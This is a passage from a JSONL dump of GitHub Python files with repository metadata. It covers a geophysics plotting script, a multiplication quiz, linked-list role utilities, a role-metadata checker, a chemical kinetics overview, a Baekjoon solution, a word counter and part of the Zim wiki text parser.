x-direction','friction in the x-direction'],['gyration in the z-direction','body force in the z-direction','friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n vmins=np.array([[-1.e7,-1.e7,-1.e5],[-1.e7,-1.e7,-1.e5]])\n vmaxs=np.array([[1.e7,1.e7,1.e5],[1e7,1.e7,1.e5]])\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n momx = gyrationcent[:,0,m]+bodyxx[:,m]+frictioncent[:,0,m]\n momz = gyrationcent[:,2,m]+bodyzz[:,m]+frictioncent[:,2,m]\n gyrfracx,gyrfracz = np.divide(gyrationcent[:,0,m],momx), np.divide(gyrationcent[:,2,m],momz)\n bodyfracx,bodyfracz = np.divide(bodyxx[:,m],momx), np.divide(bodyzz[:,m],momz)\n fricfracx,fricfracz = np.divide(frictioncent[:,0,m],momx), np.divide(frictioncent[:,2,m],momz)\n xx = np.array([[xc,xc,xc],[xc,xc,xc]])\n yy = np.array([[zc,zc,zc],[zc,zc,zc]])\n zz = np.array([[gyrfracx,bodyfracx,fricfracx],[gyrfracz,bodyfracz,fricfracz]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].scatter(xx[i,j],yy[i,j],c = zz[i,j],s=1,vmin=0,vmax=1,cmap='magma')\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('Absolute Abundance')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratio'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n \n return\nplotratiototal(1)\nplotratiototal(0)\n\n\nplotmomentum(0)\nplotmomentum(1)\n","repo_name":"sinhtrung/MomentumSourcesGeopause","sub_path":"momentumgeopause.py","file_name":"momentumgeopause.py","file_ext":"py","file_size_in_byte":30857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28953410585","text":"# This program will aks a user to enter the result of a multiplication\n# the user has 8 secomds to answer amd 3 tries\nimport pyinputplus as pyip\nimport random\nimport time\n\nnumberOfQuestions = 10\ncorrectAnswers = 0\nfor questionNumber in range(numberOfQuestions):\n # us random numbers\n num1 = random.randint(0, 9)\n num2 = random.randint(0, 9)\n\n prompt = \"#%s: %s x %s = \" % (questionNumber + 1, num1, num2)\n try:\n pyip.inputStr(prompt, allowRegexes=[\"^%s$\" % (\n num1 * num2)], blockRegexes=[(\".*\", \"Incorrect!\")], timeout=8, limit=3)\n except pyip.TimeoutException:\n print(\"Out of time\")\n except pyip.RetryLimitException:\n print(\"Out of tries\")\n else:\n print(\"Correct!\")\n correctAnswers += 1\n time.sleep(1)\nprint(\"Score: %s / %s\" % (correctAnswers, numberOfQuestions))\n","repo_name":"Jess247/python","sub_path":"python/atbsPy/projects/multiplication_quiz.py","file_name":"multiplication_quiz.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10903147435","text":"def get_roles_comunes(base):\n it_roles = base\n roles = {}\n while it_roles is not None:\n if it_roles.rol not in roles:\n roles[it_roles.rol] = 1\n else:\n roles[it_roles.rol] += 1\n it_roles = it_roles.next\n if base is not None:\n return roles\n else:\n return None\n\n\ndef print_roles_repetidos(roles):\n hay_duplicados = False\n if roles is None:\n print(\"No hay gente aun!!\")\n else:\n for rol_key in roles:\n actual_rol = roles[rol_key]\n if actual_rol > 1:\n hay_duplicados = True\n print(\"El rol numero \" + str(rol_key) + \" tiene \" + str(actual_rol) + \" personas.\")\n if not hay_duplicados:\n print(\"No hay roles duplicados\")\n\n\ndef print_esta_ordenada_por_roles(base):\n is_ordenada = True\n roles = get_roles_comunes(base) # {\"rol\": n° usuarios, ...}\n if roles is None:\n print(\"No hay usuarios aun...\")\n ite_roles = base\n while ite_roles is not None:\n actual_rol = ite_roles.rol\n \n if is_ordenada:\n print(\"Está ordenada por roles!\")\n else:\n print(\"No está ordenada por roles\")\n","repo_name":"LIbanezDev/data-structures-2020","sub_path":"simple_lists/first_exe/utils/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15198757325","text":"#!/usr/bin/python3\n\n\nimport sys\nimport yaml\n\nDISTROS = {\"fedora\": \"Fedora\", \"rhel\": \"EL\", \"centos\": \"EL\"}\n\n\ndef distro_to_platform(distro):\n \"\"\"convert distro (ID from os-release(5)) to platform used in role meta\"\"\"\n return DISTROS.get(distro, distro)\n\n\ndef role_supported_versions(metafile, distro):\n \"\"\"return a list of distribution versions that role's metadata claim to support\"\"\"\n with open(metafile, \"r\", encoding=\"utf8\") as file:\n meta = yaml.safe_load(file)\n distinfo = next(\n (\n item\n for item in meta[\"galaxy_info\"][\"platforms\"]\n if item[\"name\"] == distro_to_platform(distro)\n ),\n None,\n )\n if not distinfo:\n return []\n return distinfo[\"versions\"]\n\n\ndef version_match(version, meta_version):\n # could do more complicated matching, but for now assume that\n # meta_version is just a major version (single integer number) or wildcard\n return meta_version == \"all\" or version == str(meta_version)\n\n\ndef role_supported(metafile, distro, version):\n return any(\n (\n version_match(version, meta_version)\n for meta_version in role_supported_versions(metafile, distro)\n )\n )\n\n\nif __name__ == \"__main__\":\n USAGE = (\n f\"Usage: { sys.argv[0] } /meta/main.yml distribution [majorversion]\"\n )\n\n # sanity-check arguments\n if len(sys.argv) not in (3, 4):\n print(\"Invalid arguments.\")\n print(USAGE)\n sys.exit(2)\n if len(sys.argv) == 3:\n print(role_supported_versions(sys.argv[1], sys.argv[2]))\n sys.exit(0)\n else:\n sys.exit(not role_supported(sys.argv[1], sys.argv[2], sys.argv[3]))\n","repo_name":"linux-system-roles/test-harness","sub_path":"test/checkmeta.py","file_name":"checkmeta.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"68"} +{"seq_id":"36363679954","text":"from __future__ import print_function\nfrom lot_basis import lots_list\nimport html\nfrom kin import *\n\nfrom molmod.units import kjmol\nfrom molmod.constants import boltzmann\n\nimport matplotlib.pyplot as pt, numpy\n\nfrom matplotlib.backend_bases import GraphicsContextBase\nGraphicsContextBase.dashd[\"dashed\"] = (0, (6.0, 3.0))\nGraphicsContextBase.dashd[\"dashdot\"] = (0, (4.0, 2.0, 1.0, 2.0))\nGraphicsContextBase.dashd[\"dotted\"] = (0, (1.5, 1.5))\n\n\n\n\ndef overview(template, title, fn_img, rows):\n if len(rows) == 0:\n rows.append([u\"Approach→
Functional↓\"])\n rows.append([\"\"])\n rows[0].append(\"%s\" % title.replace(\", \", \"
\"))\n for temp in temps:\n rows[1].append(\"%.0fK\" % temp)\n lines = []\n labels = []\n pt.clf()\n line = pt.plot(invtemps, experimental_k, color=\"k\", linestyle=\"-\", lw=4)\n lines.append(line)\n labels.append(\"experiment\")\n counter = 2\n for lot in lots_list:\n if lot.spin == \"ROS\":\n lot_label = \"ro\" + lot.label\n else:\n lot_label = lot.label\n if len(rows) <= counter:\n rows.append([\"%s\" % lot_label])\n try:\n ks = load_summary(template % lot_label)[0]\n line = pt.plot(invtemps, ks, color=lot.color, linestyle=lot.linestyle, lw=2)\n lines.append(line)\n labels.append(lot_label)\n for j in range(4):\n ln10ratio = numpy.log10(ks[j]/experimental_k[j])\n color = get_error_color(ln10ratio)\n rows[counter].append(\"%.0f\" % (color, ln10ratio*10))\n except (IOError, StopIteration):\n rows[counter].append(\"    \")\n counter += 1\n pt.semilogy()\n pt.fill(\n numpy.concatenate((invtemps, invtemps[::-1])),\n numpy.concatenate((experimental_k*10, experimental_k[::-1]/10)),\n \"k\", alpha=0.2, lw=0,\n )\n pt.xticks(\n 1/numpy.array([300, 350, 400, 450, 500, 550, 600], float),\n [\"300\", \"350\", \"400\", \"450\", \"500\", \"550\", \"600\"],\n )\n pt.title(title)\n pt.xlabel(\"T [K]\")\n pt.ylabel(\"k [(m**3/mol)/s]\")\n pt.ylim(1e-8,1e7)\n legend = pt.figlegend(\n lines, labels, (0.07,0.06), ncol=3, prop={\"size\":11},\n handlelength=3, labelspacing=0.1, columnspacing=1\n )\n #legend.get_frame().set_linewidth(0)\n legend.get_frame().set_fill(True)\n legend.get_frame().set_alpha(0.5)\n pt.savefig(fn_img % \"rates\")\n\n pt.clf()\n lines = []\n labels = []\n line = pt.plot([experimental_Ea], [experimental_A], color=\"k\", marker=\"o\", ms=11, mew=2, lw=0, ls=\" \")\n lines.append(line)\n labels.append(\"experiment\")\n for lot in lots_list:\n if lot.spin == \"ROS\":\n label = \"ro\" + lot.label\n else:\n label = lot.label\n try:\n A, Ea = load_summary(template % label)[1]\n marker = {\"-\": \"o\", \"--\": \"s\", \":\": \"v\", \"-.\": \"h\"}[lot.linestyle]\n line = pt.plot([Ea], [A], color=lot.color, marker=marker, ms=11, mew=2, lw=0, ls=\" \")\n lines.append(line)\n labels.append(label)\n continue\n except (IOError, StopIteration):\n pass\n\n pt.title(title)\n pt.xlabel(\"Activation energy [kJ/mol]\")\n pt.ylabel(\"Pre-exponential factor [(m**3/mol)/s]\")\n pt.semilogy()\n # error margin around experimental data point\n x = []\n y = []\n evals, evecs = numpy.linalg.eigh(covariance_parameters)\n angles = numpy.arange(0.0,360.5,1.0)/180*numpy.pi\n data = numpy.outer(evecs[:,0],numpy.cos(angles))*numpy.sqrt(evals[0]) + \\\n numpy.outer(evecs[:,1],numpy.sin(angles))*numpy.sqrt(evals[1])\n pt.fill(\n experimental_parameters[1] + data[1],\n numpy.exp(experimental_parameters[0] + data[0]),\n color=\"k\", alpha=0.2, lw=0\n )\n # end error margin\n legend = pt.legend(\n lines, labels, loc=4, ncol=4, prop={\"size\":11},\n handlelength=1, labelspacing=0.2, columnspacing=2,\n numpoints=1,\n )\n pt.xlim(0,90)\n pt.ylim(1e3,1e7)\n #legend.get_frame().set_linewidth(0)\n legend.get_frame().set_fill(True)\n legend.get_frame().set_alpha(0.5)\n pt.savefig(fn_img % \"params\")\n\n\n\n\nwith open(\"kintab.html\", \"w\") as f:\n print(html.header % \"KIN Overview\", file=f)\n\n for do_rotor in False, True:\n ir_str = {True: \"ir\", False: \"ho\"}[do_rotor]\n ir_info = {\n True: \"internal rotor\",\n False: \"harmonic oscillator\",\n }[do_rotor]\n for do_counterpoise in False, True:\n cp_str = {True: \"cps\", False: \"bss\"}[do_counterpoise]\n cp_info = {\n True: \"with counterpoise correction\",\n False: \"without counterpoise correction\",\n }[do_counterpoise]\n\n rows = []\n\n for ts_conformer in \"Gauche\", \"Trans\":\n overview(\n \"%%s__6-31gd/%s_%s_summary_%s.txt\" % (ir_str, cp_str, ts_conformer.lower()),\n \"%s, %s, %s, Consistent, 6-31G(d)\" % (ir_str.upper(), cp_str.upper(), ts_conformer),\n \"kin_%s_%s_%s_consistent_6-31gd_%%s.pdf\" % (ir_str, cp_str, ts_conformer.lower()),\n rows,\n )\n for ts_conformer in \"Gauche\", \"Trans\":\n overview(\n \"%%s__6-311+g3df2p/%s_%s_summary_%s.txt\" % (ir_str, cp_str, ts_conformer.lower()),\n \"%s, %s, %s, Consistent, 6-311+G(3df,2p)\" % (ir_str.upper(), cp_str.upper(), ts_conformer),\n \"kin_%s_%s_%s_consistent_6-311+g3df2p_%%s.pdf\" % (ir_str, cp_str, ts_conformer.lower()),\n rows,\n )\n for ts_conformer in \"Gauche\", \"Trans\":\n overview(\n \"GEO__b3lyp__6-31gd__ENERGY__%%s__6-311+g3df2p/%s_%s_summary_%s.txt\" % (ir_str, cp_str, ts_conformer.lower()),\n \"%s, %s, %s, GEO=B3LYP/6-31G(d), 6-311+G(3df,2p)\" % (ir_str.upper(), cp_str.upper(), ts_conformer),\n \"kin_%s_%s_%s_geo_6-311+g3df2p_%%s.pdf\" % (ir_str, cp_str, ts_conformer.lower()),\n rows,\n )\n\n print(\"

10Log10 of ratio between theoretical and experimental rate (%s, %s)

\" % (ir_info, cp_info), file=f)\n html.print_table(f, rows)\n\n print(html.footer, file=f)\n","repo_name":"molmod/tamkin","sub_path":"tamkin/examples/011_ethyl_ethene_lot/kintab.py","file_name":"kintab.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"13217104270","text":"import os\nimport glob\nimport shutil\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap as LSCm\nfrom scipy.interpolate import griddata\nfrom scipy.signal import savgol_filter\nfrom scipy import integrate\n\nfrom NesrHydrusAnalyst import *\n# src = '../Datasets/sample3d'\nsrc = '../Datasets/H3D2_SandDitch0011'\ndata_frame= read_hydrus_data(folder=src, save_to_csv=False, read_velocities=True)\ndf = data_frame\nprint(data_frame.shape)\n\ndebug = 1\n\nif debug == 0:\n v=0\n X, Z, M, x_vals, z_vals = get_grid_values(data_frame,variable=v)\n print(get_legend_range(np.nanmin(M), np.nanmax(M)),\n '\\nSahpes:\\nx_vals=> {}\\nz_vals=> {}\\nX=> {}\\nZ=> {}\\nM=> {}'.format(\n x_vals.shape, z_vals.shape,X.shape, Z.shape, M.shape))\nelif debug == 1:\n variable = 0 # Theta\n time_step = 180\n grid = 0.5 # cm\n crosses = 50. # cm0)]\n tol = 10.\n section = 'y'\n\n _ = draw_full_contour(\n df,\n variable,\n time_step,\n grid,\n crosses,\n tol,\n section,\n return_arrays=False,\n x_step=12,\n z_step=10,\n mirror_x=True,\n mirror_z=False,\n fig_size=get_fig_shape(df, section))","repo_name":"drnesr/SandDitch","sub_path":"Code/PyCharmTest2.py","file_name":"PyCharmTest2.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8498986841","text":"n, m = map(int, input().split())\r\n\r\narr_a = list()\r\n\r\nfor _ in range(n):\r\n arr_a.append(list(map(int, input())))\r\n\r\narr_b = list()\r\nfor _ in range(n):\r\n arr_b.append(list(map(int, input())))\r\n\r\ncount = 0\r\n\r\n\r\ndef flip_arr(x, y, arr_a):\r\n for i in range(x, x + 3):\r\n for j in range(y, y + 3):\r\n arr_a[i][j] = 1 - arr_a[i][j]\r\n\r\n\r\nfor i in range(n - 2):\r\n for j in range(m - 2):\r\n if (arr_a[i][j] != arr_b[i][j]):\r\n flip_arr(i, j, arr_a)\r\n count += 1\r\nflag = True\r\nfor i in range(n):\r\n for j in range(m):\r\n if (arr_a[i][j] != arr_b[i][j]):\r\n flag = False\r\n break\r\nif flag != True:\r\n count = -1\r\n\r\nprint(count)\r\n","repo_name":"augusstt06/Baekjoon","sub_path":"백준/Silver/1080. 행렬/행렬.py","file_name":"행렬.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24063168185","text":"import sys\n\n\ndef count_lines(filename):\n\n opened_file = open(filename, \"r\")\n\n contents = opened_file.read()\n lines_count = contents.count(\"\\n\") + 1\n #counts the endline symbols and +1 for the 1st line\n opened_file.close()\n return lines_count\n\n\ndef count_chars(filename):\n chars_count = 0\n opened_file = open(filename, \"r\")\n for line in opened_file:\n chars_count += len(line)\n opened_file.close()\n return chars_count\n\n\ndef count_words(filename):\n words = []\n\n opened_file = open(filename, \"r\")\n\n for line in opened_file:\n line = line.split()\n for word in line:\n words.append(word)\n opened_file.close()\n return len(words)\n\n\ndef main():\n\n filename = sys.argv[2]\n if sys.argv[1] == \"chars\":\n print(count_chars(filename))\n\n elif sys.argv[1] == \"words\":\n print(count_words(filename))\n\n elif sys.argv[1] == \"lines\":\n print(count_lines(filename))\n\n else:\n print(\"Invalid command\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"UndestRoyable/HackBulgaria","sub_path":"week0/week0-file_system_problems/F6/wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"23308604227","text":"\nimport re\nimport logging\n\nimport xml.etree.ElementTree # needed to compile with cElementTree\ntry:\n\timport xml.etree.cElementTree as ElementTree\nexcept: #pragma: no cover\n\timport xml.etree.ElementTree as ElementTree\n\n\nfrom zim.errors import Error\n\nlogger = logging.getLogger('zim.parser')\n\n\ndef fix_unicode_chars(text):\n\t'''Fixes missing line end\n\t@param text: the input text\n\t@returns: the fixed text\n\t'''\n\t# These characters are recognized by \"splitlines()\" but not as end-of-line\n\t# in regexes. See also issue #1760\n\ttext = text.replace('\\u2028', '\\n') # LINE SEPARATOR\n\ttext = text.replace('\\u2029', ' ') # PARAGRAPH SEPARATOR\n\treturn text\n\n\ndef convert_space_to_tab(text, tabstop=4):\n\t'''Convert spaces to tabs\n\t@param text: the input text\n\t@param tabstop: the number of spaces to represent a tab\n\t@returns: the fixed text\n\t'''\n\t# Fix tabs\n\tspaces = ' ' * tabstop\n\tpattern = '(?m)^(\\t*)((?:%s)+)' % spaces\n\ttext = re.sub(\n\t\tpattern,\n\t\tlambda m: m.group(1) + '\\t' * (len(m.group(2)) // tabstop),\n\t\ttext\n\t)\n\t# Specify \"(?m)\" instead of re.M since \"flags\" keyword is not\n\t# supported in python 2.6\n\n\treturn text\n\n\nclass Builder(object):\n\t'''This class defines a 'builder' interface for parse trees. It is\n\tused by the parser to construct the parse tree while keeping the\n\tparser objects agnostic of how the resulting parse tree objects\n\tlook.\n\t'''\n\n\tdef start(self, tag, attrib=None):\n\t\t'''Start formatted region\n\t\t@param tag: the tag name\n\t\t@param attrib: optional dict with attributes\n\t\t@implementation: must be implemented by sub-classes\n\t\t'''\n\t\traise NotImplemented\n\n\tdef text(self, text):\n\t\t'''Append text\n\t\t@param text: text to be appended as string\n\t\t@implementation: must be implemented by sub-classes\n\t\t'''\n\t\traise NotImplemented\n\n\tdef end(self, tag):\n\t\t'''End formatted region\n\t\t@param tag: the tag name\n\t\t@raises XXX: when tag does not match current state\n\t\t@implementation: must be implemented by sub-classes\n\t\t'''\n\t\traise NotImplemented\n\n\tdef append(self, tag, attrib=None, text=None):\n\t\t'''Convenience function to open a tag, append text and close\n\t\tit immediatly. Only used for formatted text that has no\n\t\tsub-processing done.\n\t\t@param tag: the tag name\n\t\t@param attrib: optional dict with attributes\n\t\t@param text: formatted text\n\t\t@implementation: optional for subclasses, default implementation\n\t\tcalls L{start()}, L{text()}, and L{end()}\n\t\t'''\n\t\tself.start(tag, attrib)\n\t\tif not text is None:\n\t\t\tself.text(text)\n\t\tself.end(tag)\n\n\nclass BuilderTextBuffer(Builder):\n\t'''Wrapper that buffers text going to a L{Builder} object\n\tsuch that the last piece of text remains accessible for inspection\n\tand can be modified.\n\t'''\n\n\tdef __init__(self, builder):\n\t\tself.builder = builder\n\t\tself.buffer = []\n\n\t# Interface to handle text buffer\n\n\tdef get_text(self):\n\t\treturn ''.join(self.buffer)\n\n\tdef set_text(self, text):\n\t\tself.buffer = [text]\n\n\tdef clear_text(self):\n\t\tself.buffer = []\n\n\tdef flush(self):\n\t\ttext = ''.join(self.buffer)\n\t\tif text:\n\t\t\tself.builder.text(text)\n\t\tself.buffer = []\n\n\t# Builder interface\n\n\tdef start(self, tag, attrib=None):\n\t\tif self.buffer:\n\t\t\tself.flush()\n\t\tself.builder.start(tag, attrib)\n\n\tdef end(self, tag):\n\t\tif self.buffer:\n\t\t\tself.flush()\n\t\tself.builder.end(tag)\n\n\tdef text(self, text):\n\t\tself.buffer.append(text)\n\n\tdef append(self, tag, attrib=None, text=None):\n\t\tif self.buffer:\n\t\t\tself.flush()\n\t\tself.builder.append(tag, attrib, text)\n\n\nclass SimpleTreeElement(list):\n\n\t# Not unlike the Element class of xml.etree, but without the\n\t# \"text\" and \"tail\" attributes - text is just part of the list.\n\t# This makes processing so much easier...\n\n\t__slots__ = ('tag', 'attrib')\n\n\tdef __init__(self, tag, attrib=None, children=None):\n\t\tself.tag = tag\n\t\tself.attrib = attrib\n\t\tif children:\n\t\t\tself.extend(children)\n\n\tdef get(self, attr, default=None):\n\t\tif self.attrib:\n\t\t\treturn self.attrib.get(attr, default)\n\t\telse:\n\t\t\treturn None\n\n\tdef __eq__(self, other):\n\t\tif self.tag == other.tag \\\n\t\tand self.attrib == other.attrib \\\n\t\tand len(self) == len(other):\n\t\t\treturn all(s == o for s, o in zip(self, other))\n\t\telse:\n\t\t\treturn False\n\n\tdef __repr__(self):\n\t\tif len(self) > 0:\n\t\t\treturn '<%s:\\n%s>' % (self.__class__.__name__, self.pprint(level=1))\n\t\telse:\n\t\t\treturn '<%s: %s>' % (self.__class__.__name__, self.pprint(level=0).strip())\n\n\tdef __str__(self):\n\t\treturn self.__repr__()\n\n\tdef pprint(self, level=0):\n\t\t'''Returns pretty-printed text representation'''\n\t\tprefix = ' ' * level\n\t\tif len(self) > 0:\n\t\t\tlines = [prefix + '%s %r [\\n' % (self.tag, self.attrib)]\n\t\t\tfor item in self:\n\t\t\t\tif isinstance(item, SimpleTreeElement):\n\t\t\t\t\tlines.append(item.pprint(level=level + 1))\n\t\t\t\telif isinstance(item, str):\n\t\t\t\t\tfor line in item.splitlines(True):\n\t\t\t\t\t\tlines.append(prefix + ' %r\\n' % line)\n\t\t\t\telse:\n\t\t\t\t\tlines.append(prefix + ' %r\\n' % item)\n\t\t\tlines.append(prefix + ']\\n')\n\t\t\treturn ''.join(lines)\n\t\telse:\n\t\t\treturn prefix + '%s %r []\\n' % (self.tag, self.attrib)\n\n\nclass SimpleTreeBuilder(Builder):\n\t'''Builder class that builds a tree of L{SimpleTreeElement}s'''\n\n\tdef __init__(self, elementfactory=SimpleTreeElement):\n\t\tself.elementfactory = elementfactory\n\t\tself.root = []\n\t\tself.stack = [self.root]\n\t\tself.merge_text = False\n\n\tdef get_root(self):\n\t\tif not len(self.stack) == 1:\n\t\t\traise AssertionError('Did not finish processing')\n\t\treturn self.root\n\n\t# Builder interface\n\n\tdef start(self, tag, attrib=None):\n\t\telement = self.elementfactory(tag, attrib)\n\t\tself.stack[-1].append(element)\n\t\tself.stack.append(element)\n\n\tdef end(self, tag):\n\t\telement = self.stack.pop()\n\t\tif element.tag != tag:\n\t\t\traise AssertionError('Unmatched %s at end of %s' % (element.tag, tag))\n\n\tdef text(self, text):\n\t\tself.stack[-1].append(text)\n\n\tdef append(self, tag, attrib=None, text=None):\n\t\telement = self.elementfactory(tag, attrib)\n\t\tif text:\n\t\t\telement.append(text)\n\t\tself.stack[-1].append(element)\n\n\nclass ParserError(Error):\n\n\tdef __init__(self, msg):\n\t\tError.__init__(self, msg)\n\n\t\tself.parser_file = _('') # T: placeholder for unknown file name\n\t\tself.parser_text = ''\n\t\tself.parser_line_offset = (0, 0)\n\n\t@property\n\tdef description(self):\n\t\treturn _('Error in %(file)s at line %(line)i near \"%(snippet)s\"') % {\n\t\t\t'file': self.parser_file,\n\t\t\t'line': self.parser_line_offset[0],\n\t\t\t'snippet': self.parser_text.strip(),\n\t\t}\n\t\t\t# T: Extended error message while parsing a file, gives file name, line number and words where error occurred\n\n\nclass Rule(object):\n\t'''Class that defines a single parser rule. Typically used\n\tto define a regex pattern for one specific wiki format string\n\tand the processing to be done when this formatting is encountered\n\tin the text.\n\n\t@ivar tag: L{Builder} tag for result of this rule. Used by the\n\tdefault process method.\n\t@ivar pattern: the regular expression for this parser as string\n\t@ivar process: function (or object) to process matched text, or C{None}\n\tThe function should take a L{Builder} object as first argument,\n\tfollowed by one or more parameters for matched groups in the\n\tregular expression. If the regex pattern has no capturing groups\n\tthis function is called with the whole match.\n\tThe default function will use the C{tag} and C{descent}\n\tattributes\n\t@ivar decent: optional function (or object) to recursively parse the\n\ttext matched by this rule. Called in the same way as C{process}.\n\t'''\n\n\tdef __init__(self, tag, pattern, process=None, descent=None):\n\t\t'''Constructor\n\t\t@param tag: L{Builder} tag for result of this rule. Used by the\n\t\tdefault process method.\n\t\t@param pattern: regex pattern as string\n\t\t@param process: optional function to process matched text\n\t\t@param descent: optional function to recursively parse matched text\n\t\t'''\n\t\tassert tag is not None or process is not None, 'Need at least a tag or a process method'\n\t\tself._re = None\n\t\tself.tag = tag\n\t\tif isinstance(pattern, str):\n\t\t\tself.pattern = pattern\n\t\telse:\n\t\t\tself.pattern = pattern.pattern # Assume compiled regular expression\n\t\tself.descent = descent\n\t\tself.process = process or self._process\n\n\tdef __repr__(self):\n\t\treturn '<%s: %s: %s>' % (self.__class__.__name__, self.tag, self.pattern)\n\n\tdef __or__(self, other):\n\t\t'''Allow new parsers to be constructed by combining parser\n\t\tobjects with the \"|\" operator.\n\t\t'''\n\t\treturn Parser(self, other)\n\n\tdef _process(self, builder, text):\n\t\t# default action for matched text\n\t\tif self.descent:\n\t\t\tbuilder.start(self.tag)\n\t\t\tself.descent(builder, text)\n\t\t\tbuilder.end(self.tag)\n\t\telse:\n\t\t\tbuilder.append(self.tag, None, text)\n\n\nclass Parser(object):\n\t'''Parser class that matches multiple rules at once. It will\n\tcompile the patterns of various rules into a single regex and\n\tbased on the match call the correct rules for processing.\n\n\t@ivar rules: list with L{Rule} objects, can be modified until the\n\tparser is used for the first time for parsing (the attribute\n\tbecomes a tuple afterwards)\n\t@ivar process_unmatched: function (or object) to process un-matched\n\ttext, or C{None}.\n\tThe function should take a L{Builder} object as first argument,\n\tfollowed by one or more parameters for matched groups in the\n\tregular expression.\n\t'''\n\n\tdef __init__(self, *rules):\n\t\t'''Constructor\n\t\t@param rules: list of rules to match (each should derive from\n\t\tL{SimpleReParser}, so be either a single rule, or a compound\n\t\trule.)\n\t\t'''\n\t\tself.rules = [] #: sub rules\n\t\tself.process_unmatched = self._process_unmatched\n\t\tself._re = None\n\n\t\tfor rule in rules:\n\t\t\tif isinstance(rule, Parser):\n\t\t\t\tself.rules.extend(list(rule.rules))\n\t\t\telse:\n\t\t\t\tassert isinstance(rule, Rule)\n\t\t\t\tself.rules.append(rule)\n\n\t\tassert self.rules, 'No rules defined for this parser'\n\n\tdef _process_unmatched(self, builder, text):\n\t\t# default action for unmatched text\n\t\tbuilder.text(text)\n\n\tdef __or__(self, other):\n\t\t'''Allow new parsers to be constructed by combining parser\n\t\tobjects with the \"|\" operator.\n\t\t'''\n\t\treturn self.__class__(self, other)\n\t\t\t# Return extended copy, not modify self\n\t\t\t# __init__ of new instance will make a copy of our rules\n\n\tdef __call__(self, builder, text):\n\t\t'''Each parser object is callable so it can be used as a\n\t\tprocessing function in any other parser object. This method\n\t\tparses the given text and calls the appropriate methods of the\n\t\tL{Builder} object to construct the parse results.\n\n\t\t@param builder: a L{Builder} object\n\t\t@param text: to be parsed text as string\n\t\t'''\n\t\tif not text:\n\t\t\tlogger.warning('Parser got empty string')\n\t\t\treturn\n\n\t\tif self._re is None:\n\t\t\t# Generate the regex and cache it for re-use\n\t\t\tself.rules = tuple(self.rules) # freeze list\n\t\t\tpattern = r'|'.join([\n\t\t\t\tr\"(?P%s)\" % (i, r.pattern)\n\t\t\t\t\tfor i, r in enumerate(self.rules)\n\t\t\t])\n\t\t\t#print('PATTERN:\\n', pattern.replace(')|(', ')\\t|\\n('), '\\n...')\n\t\t\tself._re = re.compile(pattern, re.U | re.M | re.X)\n\n\t\titer = 0\n\t\tend = len(text)\n\t\tmatch = self._re.search(text, iter)\n\t\twhile match:\n\t\t\tmstart, mend = match.span()\n\t\t\tif mstart > iter:\n\t\t\t\ttry:\n\t\t\t\t\tself.process_unmatched(builder, text[iter:mstart])\n\t\t\t\texcept Exception as error:\n\t\t\t\t\tself._raise_exception(error, text, iter, mstart, builder)\n\n\t\t\tname = match.lastgroup # named outer group\n\t\t\ti = int(name[4:]) # name is e.g. \"rule1\"\n\t\t\tgroups = [g for g in match.groups() if g is not None]\n\t\t\tif len(groups) > 1:\n\t\t\t\tgroups.pop(0) # get rid of named outer group if inner groups are defined\n\n\t\t\tself._backup_iter = 0\n\t\t\ttry:\n\t\t\t\tself.rules[i].process(builder, *groups)\n\t\t\texcept Exception as error:\n\t\t\t\tself._raise_exception(error, text, mstart, mend, builder, self.rules[i])\n\n\t\t\titer = mend - self._backup_iter\n\t\t\tmatch = self._re.search(text, iter)\n\t\telse:\n\t\t\t# no more matches\n\t\t\tif iter < end:\n\t\t\t\ttry:\n\t\t\t\t\tself.process_unmatched(builder, 